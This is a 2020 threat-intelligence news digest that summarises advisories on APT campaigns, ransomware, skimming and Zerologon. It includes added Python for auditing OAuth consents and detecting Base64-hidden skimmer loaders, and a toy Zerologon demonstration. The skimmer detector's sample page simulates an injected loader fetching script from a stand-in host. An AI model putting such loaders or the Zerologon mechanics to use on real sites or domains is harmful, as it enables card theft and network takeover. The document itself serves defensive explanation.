Daily Press

October 20, 2020

 

Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities

In a cybersecurity advisory, NSA has published a list of 25 publicly known vulnerabilities that Chinese state-sponsored threat actors are actively exploiting. The affected products are widely used for remote access and externally facing web services, including by defense contractors, so unpatched instances are directly reachable from the internet.

NSA Cybersecurity Advisory

October 20, 2020

 

Another Office 365 OAuth Attack Targets Coinbase Users to Gain Compromised Email Access

Researchers at KnowBe4 have discovered a new consent-phishing attack that abuses OAuth application consent: instead of stealing credentials, it tricks Office 365 users into granting a malicious application access to their mailbox. The attacks target users of the Coinbase digital currency exchange with a phishing email designed to look like a terms of service update.
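The practical follow-up to a consent-phishing campaign is not a password reset, which does not remove an application's consent grant, but a review of which third-party applications have been granted mailbox scopes and by whom. The Python below is an added example, not KnowBe4's code: it scans a constructed sample of Azure AD "Consent to application" audit records (simplified field names, not Microsoft's exact schema) and flags grants that include mailbox permissions, ranking unverified publishers highest.

```python
import json

# Constructed sample in the shape of Azure AD audit records for the
# "Consent to application" activity. Field names are simplified
# assumptions for this example, not Microsoft's exact schema.
SAMPLE_AUDIT_LOG = json.dumps([
    {"activity": "Consent to application", "user": "alice@example.test",
     "app": "Coinbase Terms Update", "publisher_verified": False,
     "scopes": ["User.Read", "Mail.Read", "Mail.ReadWrite", "offline_access"]},
    {"activity": "Consent to application", "user": "bob@example.test",
     "app": "Contoso Expense Tracker", "publisher_verified": True,
     "scopes": ["User.Read", "Calendars.Read"]},
    {"activity": "Consent to application", "user": "carol@example.test",
     "app": "Mail Archiver", "publisher_verified": True,
     "scopes": ["Mail.Read"]},
    {"activity": "Add user", "user": "admin@example.test",
     "app": None, "scopes": []},
])

# Delegated Microsoft Graph scopes that hand an application the mailbox itself.
MAILBOX_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send",
                  "Mail.Read.Shared", "Mail.ReadWrite.Shared",
                  "MailboxSettings.ReadWrite"}
PERSISTENT_SCOPE = "offline_access"   # grants a refresh token
SEVERITY_RANK = {"high": 0, "medium": 1}


def assess_consent(record):
    """Return (severity, reasons) for one audit record, or None when the
    record is not a consent event or grants no mailbox scope."""
    if record.get("activity") != "Consent to application":
        return None
    scopes = set(record.get("scopes") or [])
    mailbox = sorted(scopes & MAILBOX_SCOPES)
    if not mailbox:
        return None
    reasons = ["mailbox scopes granted: " + ", ".join(mailbox)]
    severity = "medium"
    if not record.get("publisher_verified", False):
        reasons.append("publisher not verified")
        severity = "high"
    if PERSISTENT_SCOPE in scopes:
        reasons.append("offline_access granted: refresh token outlives the session")
    return severity, reasons


def find_risky_consents(audit_json):
    """Parse an audit export and return flagged grants, highest severity first."""
    findings = []
    for record in json.loads(audit_json):
        result = assess_consent(record)
        if result is None:
            continue
        severity, reasons = result
        findings.append({"app": record["app"], "user": record["user"],
                         "severity": severity, "reasons": reasons})
    findings.sort(key=lambda f: (SEVERITY_RANK[f["severity"]], -len(f["reasons"])))
    return findings


if __name__ == "__main__":
    for finding in find_risky_consents(SAMPLE_AUDIT_LOG):
        print(finding["severity"].upper(), finding["app"], "granted by", finding["user"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

In a real tenant the records come from the Azure AD audit log or from the Microsoft Graph oauth2PermissionGrants collection; remediation is to revoke the grant and the application's refresh tokens, since the grant survives a user password reset.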

KnowBe4

October 19, 2020

 

New Vizom Malware Discovered Targets Brazilian Bank Customers with Remote Overlay Attacks

Researchers at IBM Security have discovered a new malware family, dubbed Vizom, targeting Brazilian bank account holders. The malware disguises itself as video conferencing software, spreads through spam-based phishing campaigns, and uses remote overlay techniques and DLL hijacking.

IBM

October 19, 2020

 

GravityRAT: The Spy Returns

In a new blog post, researchers at Kaspersky discuss the modifications in the active GravityRAT campaign, which is likely attributable to a Pakistani hacker group and targets the Indian armed forces. The most notable change since the 2015-2018 campaign is multi-platform support, specifically the addition of Android and macOS versions.

Kaspersky

October 14, 2020

 

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant researchers have identified a financially motivated threat group, now tracked as FIN11, whose activities may have been incorrectly attributed to TA505 in the past. While the two groups share similarities in TTPs, the researchers have observed enough differences to now track them separately.

Mandiant Threat Intelligence

October 13, 2020

 

Norway Says Russian Hackers Carried Out Breach at Parliament

According to Norwegian officials, Russian state-sponsored threat actors were responsible for attacks on the Norwegian parliament in August this year. The attacks targeted members of the Labour Party and the Centre Party, and according to the officials the actors stole data from email accounts. No technical evidence has been released, and the Norwegian Police Security Service has stated that the investigation is ongoing.

CyberScoop

October 12, 2020

 

New Action to Combat Ransomware Ahead of U.S. Elections

Microsoft has teamed up with organizations including FS-ISAC, Symantec, and ESET to disable Trickbot, one of the world's most notorious botnets. Microsoft has used a court order granted in Virginia to cut off key infrastructure to those operating Trickbot, disrupting the ability to initiate new infections or activate ransomware.

Microsoft

October 12, 2020

 

Threat Landscape Trends: LOLBins, Operating Systems, and Threat Types

In part two of its Threat Landscape Trends blog series, Cisco Security analyst Ben Nahorney covers the most frequently encountered IoC alerts from the first six months of 2020, with a focus on the trend of attackers using "living off the land" binaries (LOLBins): legitimate, signed system tools repurposed for malicious ends.

Cisco Security

October 9, 2020

 

Ransomware Gang Now Using Critical Windows Flaw in Attacks

Threat group TA505 has been observed exploiting the Zerologon vulnerability (CVE-2020-1472) with an updated build of Mimikatz, using the resulting elevated privileges on target systems to run malicious scripts. TA505 has been active since 2014, attacking victims across a wide range of industries and distributing a variety of malware, including banking trojans, backdoors, and ransomware.

Bleeping Computer

October 7, 2020

 

HP Device Manager Vulnerabilities May Allow Full System Takeover

Three HP Device Manager vulnerabilities (CVE-2020-6925, CVE-2020-6926, and CVE-2020-6927) can be chained by a threat actor to achieve remote command execution. HP has patched the vulnerabilities; however, a working exploit could be crafted against systems that have not been updated.

Help Net Security

October 7, 2020

 

BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps

Researchers at Blackberry released a white paper today covering the threat group known as BAHAMUT, a sophisticated hack-for-hire cyberespionage group noted for its technical capabilities and emblematic of the growing market for outsourced, third-party intelligence operations.

Blackberry

October 6, 2020

 

PoetRAT: Malware Targeting Public and Private Sector in Azerbaijan Evolves

The PoetRAT malware, initially identified in April 2020, has been seen targeting public and private sector organizations across Azerbaijan amid the violence in the Nagorno-Karabakh region. The actors behind the attacks, currently unidentified, have made PoetRAT harder to detect by implementing a new exfiltration protocol and obfuscation techniques to hide its activity.

Cisco Talos

October 6, 2020

 

HEH, A New IoT P2P Botnet Going After Weak Telnet Services

A newly discovered botnet has been observed in the wild performing DDoS attacks and cryptomining. The botnet, named HEH, is written in Go, spreads by brute-forcing Telnet services on ports 23 and 2323, and can execute arbitrary shell commands on infected devices.

360Netlab

October 5, 2020

 

Black-T: New Cryptojacking Variant from TeamTnT

Unit 42 has uncovered a new cryptojacking malware variant, dubbed Black-T, being used in operations by the threat group TeamTnT. The group targets Docker daemon APIs exposed to the internet and, upon successful exploitation, drops Black-T. TeamTnT is known for stealing AWS credential files and mining Monero cryptocurrency.

Unit 42

October 5, 2020

 

Mobile Network Operator Falls Into The Hands of Fullz House Criminal Group

Boom! Mobile has fallen victim to a Magecart card-skimming attack by the threat group Fullz House, also known as Magecart Group 4. The attack involves the injection of a Base64-encoded URL that loads a credit card skimmer disguised as a Google Analytics element. At the time of reporting, the Boom! Mobile website was still compromised and online shoppers remained at risk.
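Skimmer loaders of this kind hide the second-stage host inside a Base64 string so that a plain search of the page source for the attacker's domain finds nothing. The Python below is an added example, not Malwarebytes' tooling: it pulls inline script bodies out of a page, decodes Base64-looking string literals, and reports any that decode to a URL on a host outside an allowlist of first-party and known analytics domains. The HTML and the host stats.example.test are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample page: a legitimate Google Analytics include, a benign
# Base64 string that is not a URL, and an injected loader whose script
# source is hidden behind atob(). The host stats.example.test is made up.
INJECTED_URL = "https://stats.example.test/cdn/ga.js"
INJECTED_B64 = base64.b64encode(INJECTED_URL.encode()).decode()
BENIGN_B64 = base64.b64encode(b"session-id-12345").decode()

SAMPLE_HTML = (
    "<html><head>\n"
    '<script async src="https://www.google-analytics.com/analytics.js"></script>\n'
    "<script>\n"
    "  window.dataLayer = window.dataLayer || [];\n"
    '  var sessionId = "' + BENIGN_B64 + '";\n'
    "</script>\n"
    "<script>\n"
    "  var ga = document.createElement('script');\n"
    "  ga.src = atob('" + INJECTED_B64 + "');\n"
    "  document.head.appendChild(ga);\n"
    "</script>\n"
    '</head><body><form id="checkout"></form></body></html>\n'
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Quoted string literals that look like Base64: alphabet only, 16+ chars.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_if_url(token):
    """Decode a Base64 candidate and return it as an absolute URL, or None."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if text.startswith("//"):          # protocol-relative, common in skimmers
        return "https:" + text
    if text.startswith(("http://", "https://")):
        return text
    return None


def is_first_party(host, allowed_hosts):
    return host in allowed_hosts or any(host.endswith("." + h) for h in allowed_hosts)


def find_hidden_loaders(html, allowed_hosts):
    """Report Base64-encoded URLs in inline scripts that point off the allowlist."""
    findings = []
    for script in SCRIPT_RE.finditer(html):
        for token in B64_LITERAL_RE.findall(script.group(1)):
            url = decode_if_url(token)
            if url is None:
                continue
            host = (urlparse(url).hostname or "").lower()
            if is_first_party(host, allowed_hosts):
                continue
            findings.append({"host": host, "url": url, "encoded": token})
    return findings


if __name__ == "__main__":
    for finding in find_hidden_loaders(SAMPLE_HTML, {"google-analytics.com"}):
        print("hidden loader ->", finding["url"], "(from", finding["encoded"] + ")")
```

The genuine analytics include passes because google-analytics.com is on the allowlist, while the look-alike loader does not; in a real site the allowlist would hold the store's own domains and its known tag vendors. This is a triage heuristic only: skimmers also use hex escapes, character-code arrays and string concatenation, so an empty result does not clear a page.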

Malwarebytes

October 5, 2020

 

Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?

Researchers at CyberArk Labs detail privilege-escalation vulnerabilities discovered in popular antivirus products. The flaws stem from the default Discretionary Access Control Lists (DACLs) on the Windows ProgramData folder, which let unprivileged users create files and directories that the antivirus products later handle with elevated privileges, allowing a local attacker to escalate privileges on a compromised system. Affected products include those from Avira, Check Point, Fortinet, Kaspersky, McAfee, Microsoft Defender, Symantec, and Trend Micro, all of which have since been fixed by their vendors.

CyberArk

October 5, 2020

 

MosaicRegressor: Lurking in the Shadows of UEFI

A UEFI rootkit, dubbed MosaicRegressor by Kaspersky, has been discovered in the wild being used by a Chinese-speaking threat group in data theft and espionage operations. MosaicRegressor is only the second UEFI rootkit identified in the wild, after LoJax, which was discovered in 2018.

Kaspersky

September 25, 2020

 

German-Made FinSpy Spyware Found in Egypt, and Mac and Linux Versions Revealed

Amnesty International released details of a malicious FinSpy surveillance campaign targeting Egyptian civil society organizations. FinSpy, commercial surveillance software marketed to law enforcement, has been used by what is believed to be an Egyptian state-sponsored hacking group since September 2019. The group has been targeting both desktop and mobile devices across Linux, macOS, Android, and Windows, giving the operators capabilities such as intercepting calls, turning on webcams and microphones, and exfiltrating data.

Amnesty International

September 24, 2020

 

Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS

A critical code execution vulnerability in the Instagram app was discovered and patched in February, impacting the app for both Android and iOS (CVE-2020-1895). Researchers at Check Point Security have released details on how an attacker could leverage the vulnerability against users who have not yet updated their application since the patch release.

Check Point Security

September 24, 2020

 

Gadolinium - Detecting Empires in the Cloud

The Microsoft Threat Intelligence Center (MSTIC) recently tracked spearphishing-initiated attacks by the Chinese threat group Gadolinium, also known as APT40, which used Azure Active Directory applications as part of its command-and-control infrastructure. In response, Microsoft removed 18 Azure AD applications the group had been using. MSTIC provides an analysis of the Gadolinium attack chain, as well as a deep dive into the tactics and techniques used by the group.

Microsoft

September 24, 2020

 

Federal Agency Compromised by Malicious Cyber Actor

An undisclosed US federal agency has fallen victim to a sophisticated multi-stage malware attack. The threat actors responsible for the attack obtained valid access credentials for multiple O365 accounts, and installed an SSH tunnel and reverse SOCKS proxy to maintain persistence on the network.

CISA

September 23, 2020

 

Case Study: Emotet Thread Hijacking, an Email Attack Technique

Emotet malspam is currently a common email-based threat, known for constantly updating to evade detection. In a case study, Unit 42 researchers show an example of Emotet thread hijacking, and discuss this technique in-depth.

Unit 42

September 23, 2020

 

Group-IB Detects Series of Ransomware Attacks by OldGremlin

A new Russian-speaking threat group known as OldGremlin is behind targeted spearphishing, malware, and ransomware attacks against Russian businesses, according to research by Group-IB. The attacks are especially unusual given the unspoken rule against targeting Russian entities from within Russia and other post-Soviet countries, leading the researchers to believe the actors may be operating from a post-Soviet nation with strained or contentious relations with Russia.

Group-IB

September 22, 2020

 

APT28 Delivers Zebrocy Malware Campaign Using NATO Theme As Lure

An APT28 campaign targeting government bodies of NATO members, beginning in August 2020, has been identified by researchers at QuoIntelligence. APT28, a known Russian hacking group, has been tied to attacks against NATO members in the past.

QuoIntelligence

September 22, 2020

 

'DisrupTor' Dark-Web Crackdown Leads to 179 Arrests by International Law Enforcement

US and European law enforcement have announced the arrest of 179 alleged drug traffickers in Operation DisrupTor, an international sting operation targeting illicit underground commerce sites such as AlphaBay and Dream.

CyberScoop

September 21, 2020

 

New Snort, ClamAV Coverage Strikes Back Against Cobalt Strike

Cisco Talos gives an in-depth review of the Cobalt Strike attack framework in a newly released white paper. The research discusses the challenges of detecting Cobalt Strike activity and the reasoning behind crafting effective Snort and ClamAV signatures that catch its obfuscation and data exfiltration.

Cisco Talos

September 18, 2020

 

Rampant Kitten – An Iranian Espionage Campaign

An ongoing Iranian espionage campaign, dubbed Rampant Kitten, has been operating for at least six years, targeting Iranian minority groups on personal computers and mobile devices. In a deep dive into the campaign, researchers at Check Point Research outline the attack vectors, tools, and methods used.

Check Point Research

September 18, 2020

 

Leading U.S. Laser Developer IPG Photonics Hit With Ransomware

Fiber laser developer IPG Photonics has suffered a ransomware attack, shutting down worldwide IT systems for the business and halting manufacturing and shipping. The ransom note indicates that RansomExx, also known as Defray777, is responsible for the attack.

Bleeping Computer

September 17, 2020

 

Talos Vulnerability Report: Remote Code Execution Vulnerability Apple Safari

A remote code execution vulnerability (CVE-2020-9951) has been discovered and reported by Cisco Talos in an Apple Safari WebKit feature. Apple released security updates for Safari 14.0 today which includes a patch for the vulnerability.

Cisco Talos

September 17, 2020

 

Maze Gang Distributed Ransomware Payload Inside VM

The threat actors behind the Maze ransomware have conducted an attack borrowing a technique from Ragnar Locker, in which the ransomware payload is run inside a virtual machine to evade endpoint security on the host. The incident took place in July 2020 and was uncovered by researchers at Sophos MTR.

Sophos

September 17, 2020

 

Internet Explorer Now Warns of Adobe Flash's Upcoming Demise

Following the release of a Windows 10 cumulative update, Microsoft is reminding Internet Explorer users that Adobe Flash support is coming to an end, and that sites using Flash content will no longer be supported after December 2020.

Bleeping Computer

September 16, 2020

 

Seven International Cyber Defendants, Including “APT41” Actors, Charged

Seven cyber actors, all residents and nationals of the People's Republic of China, have been charged for their involvement in conducting computer network exploitations affecting more than 100 victim companies and organizations in the US and abroad. The threat actors are known to be affiliated with APT41. Two individuals have been arrested in Malaysia; the remaining five defendants are fugitives in China.

US Department of Justice

September 16, 2020

 

Spoofed Training Email from Phishing Simulator Company

Analysts at Cofense Intelligence have analyzed a security training-themed phishing campaign that has compromised at least 30 domains since April 2020. The phishing attacks aim to gather Microsoft Outlook credentials through malicious embedded links in the phishing emails.

Cofense

September 15, 2020

 

Rudeminer, Blacksquid and Lucifer Walk Into A Bar

Researchers at Check Point Research have found evidence that the threat actors behind Lucifer, a cryptojacking and DDoS hybrid malware that targets Windows, Linux, and IoT devices, started campaign operations in 2018. Data obtained through ThreatCloud shows recent Lucifer activity in the US, Ireland, the Netherlands, Turkey, and India, hitting over 25 organizations across industries including banking, manufacturing, and legal.

Check Point Research

September 15, 2020

 

Threat Analysis: URSA Trojan Impacts Many Countries Using Sophisticated Loader

In a deep dive analysis of the URSA trojan, researchers at Seguranca Informatica have dissected the malware used to target thousands of victims across Mexico and much of South America since June 2020. The URSA trojan is designed to collect banking credentials by creating a banking overlay window that the victim interacts with when visiting their home banking portal.

Seguranca Informatica

September 15, 2020

 

Data Breaches Expose Vets, COVID-19 Patients

Recent data breaches at the US Department of Veterans Affairs and within the UK National Health Service have exposed the personal data of approximately 46,000 US veterans and 18,000 Welsh residents.

Threatpost

September 14, 2020

 

Magento Stores Hit By Magecart; Largest Automated Hacking Attack Since 2015

A Magecart credit card skimming campaign compromised 1,904 online stores running the Magento e-commerce platform over the weekend, the largest automated attack of its kind seen since 2015.

Bleeping Computer

September 14, 2020

 

CISA Alert: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

The Cybersecurity and Infrastructure Security Agency (CISA) warns in an advisory that Chinese MSS-affiliated threat actors are targeting US government agencies and private companies by exploiting vulnerabilities in F5, Citrix, Pulse Secure, and Microsoft Exchange Server.

CISA - Alert (AA20-258A)

September 14, 2020

 

Virginia's Largest School System Hit With Ransomware

Fairfax County Public Schools, the largest public school system in Virginia, has confirmed a ransomware attack on its technology systems. The Maze ransomware group claims responsibility for the attack.

Dark Reading

September 11, 2020

 

Zerologon: Instantly Become Domain Admin by Subverting Netlogon Cryptography

Secura security researchers have published a test tool and white paper detailing CVE-2020-1472, a vulnerability that stems from a flaw in the cryptographic authentication scheme used by the Netlogon Remote Protocol. Microsoft has patched the vulnerability, and Secura urges all impacted organizations to install the patch on domain controllers as soon as possible.
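The Netlogon flaw behind this entry and the TA505 item above lies in how the protocol uses AES in CFB8 mode with an all-zero initialisation vector: a client that sends an all-zero challenge and an all-zero credential is accepted whenever the first byte of the block cipher's output on an all-zero block happens to be zero, which holds for roughly 1 in 256 session keys, and an attacker simply retries until it does. The Python below is an added example, not Secura's test tool, and it is not an exploit: it substitutes a SHA-256-based keyed function for AES (CFB8 only uses the cipher's forward direction, so the mode-level structure is identical), shows why acceptance depends on a single keystream byte, and measures how often a fresh random key satisfies it. The real attack additionally relies on the RPC signing and sealing bypass and on the password-reset call, neither of which is modelled here.

```python
import hashlib
import random

BLOCK_SIZE = 16            # AES block size in bytes
ZERO_IV = bytes(BLOCK_SIZE)


def toy_block_encrypt(key, block):
    """Stand-in for the AES block function: a keyed pseudo-random function
    built from SHA-256. NOT AES (constructed for this example); CFB8 only
    calls the forward direction, so the mode-level behaviour is the same."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key, iv, plaintext):
    """CFB8: each plaintext byte is XORed with the first byte of
    E(key, register); the ciphertext byte is then shifted into the
    register. Netlogon applies this with iv = 16 zero bytes."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ toy_block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key, iv, ciphertext):
    """Inverse of cfb8_encrypt: the register is fed the ciphertext byte."""
    register = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ toy_block_encrypt(key, bytes(register))[0])
        register = register[1:] + bytes([c])
    return bytes(out)


def first_keystream_byte_is_zero(session_key):
    return toy_block_encrypt(session_key, ZERO_IV)[0] == 0


def zero_credential_accepted(session_key):
    """The client proves knowledge of the session key by sending
    CFB8(session_key, IV=0, client_challenge). An attacker who picks an
    all-zero challenge and submits an all-zero credential is accepted
    exactly when the first keystream byte is zero: every ciphertext byte
    is then zero and the register never changes."""
    return cfb8_encrypt(session_key, ZERO_IV, bytes(8)) == bytes(8)


def sample_keys(count, seed):
    """Deterministic stand-in for the fresh session key of each attempt."""
    rng = random.Random(seed)
    return [rng.getrandbits(8 * BLOCK_SIZE).to_bytes(BLOCK_SIZE, "big")
            for _ in range(count)]


def search_for_accepting_key(seed):
    """Count authentication attempts (each with a fresh session key) until
    the all-zero credential is accepted. The expected count is about 256."""
    attempts = 0
    rng = random.Random(seed)
    while True:
        attempts += 1
        key = rng.getrandbits(8 * BLOCK_SIZE).to_bytes(BLOCK_SIZE, "big")
        if zero_credential_accepted(key):
            return attempts, key


def observed_acceptance_rate(trials=20000, seed=1):
    """Fraction of random session keys that accept the all-zero credential."""
    hits = sum(zero_credential_accepted(k) for k in sample_keys(trials, seed))
    return hits / trials


if __name__ == "__main__":
    attempts, key = search_for_accepting_key(seed=42)
    print(f"accepted after {attempts} attempts with session key {key.hex()}")
    print(f"acceptance rate over 20000 keys: {observed_acceptance_rate():.4f}"
          f" (1/256 = {1 / 256:.4f})")
```

Because the accepting keys are a property of the mode, not of any weakness in the block cipher, swapping the toy function for real AES changes nothing about the rate; the fix in Microsoft's patch is to reject unauthenticated Netlogon sessions that use this scheme rather than to alter the cipher.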

Secura

September 10, 2020

 

Credential Phishing Attack Performs Real-Time AD Authentication

The Armorblox Threat Research Team has identified a phishing campaign that performed real-time validation against an undisclosed organization's Active Directory to harvest Office 365 credentials. The team provides a breakdown of the attack flow and of the infrastructure behind the attack.

Armorblox

September 10, 2020

 

Equinix Data Center Giant Hit by Netwalker Ransomware, $4.5M Ransom

International data center provider Equinix was hit with a Netwalker ransomware attack over the Labor Day weekend. The ransom note includes screenshots of allegedly stolen data, indicating theft of accounting and financial information from the business, alongside a demand for 455 bitcoin.

Bleeping Computer

September 10, 2020

 

Razer Gaming Fans Caught Up in Data Leak

Due to a misconfigured Elasticsearch cloud cluster, an estimated 100K Razer Gaming customers may have had private information exposed to the public. The database contained customer information including full names, phone numbers, email addresses, order details, and more.

Threatpost

September 10, 2020

 

Who Is Calling? CDRThief Targets Linux VoIP Softswitches

Newly identified CDRThief malware has been discovered and analysed by ESET researchers. The malware is designed to target Linknat VOS2009 and VOS3000 Chinese VoIP platforms, with a primary goal of exfiltrating Call Detail Records (CDR) from a compromised softswitch.

ESET

September 9, 2020

 

Malvertising Campaigns Come Back in Full Swing

Malwarebytes Labs researchers uncovered a large malvertising campaign targeting the heavily trafficked xHamster website. The team provides a deeper look into this campaign and into modern malvertising.

Malwarebytes Labs

September 9, 2020

 

Java Network Launch Protocol - Another Way For Distributing Java Downloaders

Security researchers at Forcepoint X-Labs have identified a component in Java Network Launch Protocol (JNLP) that is actively being leveraged to automate malware download and execution.

Forcepoint

September 8, 2020

 

GhostDNSbusters

A dive into GhostDNS infrastructure and various elements of phishing targets and victimology, provided by researcher Nick Byers of Team Cymru and in collaboration with Manabu Niseki and CERT.br.

Team Cymru

September 8, 2020

 

TikTok Spyware

Researchers at Zscaler provide a detailed analysis into a spyware application masquerading as TikTok Pro.

Zscaler

September 8, 2020

 

Exposed Docker Server Abused to Drop Cryptominer, DDoS Bot

An attack that drops a DDoS bot and a cryptocurrency miner on a Docker container built using Alpine Linux as its base image has been reported by Trend Micro. A similar attack was reported in May this year, confirming that malicious actors continue targeting environments running Docker containers.

Trend Micro

July 31, 2020

 

WastedLocker: Technical Analysis

Garmin was the target of a ransomware attack in July 2020; a technical analysis by Kaspersky Labs indicates threat actors used the WastedLocker ransomware.

Kaspersky Labs

July 30, 2020

 

Cybercriminals Targeting Multiple Vulnerabilities in WordPress Plugins 

Researchers at Zscaler uncovered campaigns targeting WordPress vulnerabilities, exploiting them to perform malvertising activities.

Zscaler ThreatLabz

July 30, 2020

 

Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 

Trend Micro researchers discovered a Mirai botnet variant exploiting CVE-2020-5902, a critical remote code execution vulnerability in F5 BIG-IP devices.

Trend Micro

July 30, 2020

 

Malspam Campaign Caught Using GuLoader After Service Relaunch

Following the July 11 relaunch of CloudEyE, a service run by an Italian company that was exposed in June as a front for the GuLoader malware operation, Malwarebytes Labs researchers observed renewed GuLoader downloader malspam campaigns.

Malwarebytes Labs

July 29, 2020

 

Sneaky Doki Linux Malware Infiltrates Docker Cloud Instances 

Threat actors are targeting misconfigured Docker instances with Doki, a Linux malware strain deployed in the Ngrok botnet cryptomining campaign.

Bleeping Computer

July 29, 2020

 

Android Spyware Targeting Tanzania Premier League 

Researchers at Zscaler discovered Android spyware impersonating legitimate fan applications for the Tanzania Mainland Premier League.

Zscaler ThreatLabZ

July 29, 2020

 

'Ghostwriter' Influence Campaign 

"Unknown Actors Leverage Website Compromises and Fabricated Content to Push Narratives Aligned With Russian Security Interests." The Mandiant Threat Intelligence team has released a white paper discussing connections within the "Ghostwriter" campaign.

Mandiant Threat Intelligence

July 29, 2020

 

Threat Actors Bypass Gateways with Google Ad Redirects

Cofense analysts have identified an Office 365 login credential phishing campaign which uses a Google Ad Services redirect to fool email gateways.

Cofense Phishing Defense Center

July 28, 2020

 

Chinese State-Sponsored Group ‘RedDelta’ Targets the Vatican and Catholic Organizations

Since May 2020, the Vatican and the Catholic Diocese of Hong Kong have been targeted by RedDelta, a Chinese state-sponsored threat activity group.

Recorded Future - Insikt Group

July 28, 2020

 

Lazarus on the Hunt For Big Game

Researchers at Kaspersky Labs conclude that the MATA framework and VHD ransomware are both owned and operated by Lazarus.

Kaspersky Labs

July 27, 2020

 

Ensiko: A Webshell With Ransomware Capabilities

Trend Micro provides a deep-dive into Ensiko, a PHP web shell with ransomware capabilities.

Trend Micro